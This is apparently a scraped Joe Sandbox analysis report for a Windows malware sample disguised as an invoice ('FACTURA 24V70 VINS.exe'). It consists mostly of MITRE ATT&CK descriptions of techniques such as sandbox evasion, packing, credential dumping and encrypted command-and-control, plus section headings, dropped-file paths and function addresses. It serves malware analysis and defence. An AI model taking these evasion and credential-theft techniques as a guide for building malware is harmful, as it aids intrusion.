Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FACTURA 24V70 VINS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FACTURA 24V70 VINS.exe.log

C:\Users\user\AppData\Local\Temp\n-T73hKo

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
FACTURA 24V70 VINS.exe

Function 056ECCA6 Relevance: 1.8, Strings: 1, Instructions: 563
COMMON

Function 07605F68 Relevance: 1.6, APIs: 1, Instructions: 69
nativeCOMMON

Function 0150D349 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Function 0150D358 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 02F9159C Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Function 02F915A8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0150AF8F Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Function 0150590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Function 015044F0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 07627E80 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Function 07626020 Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Function 0762602C Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre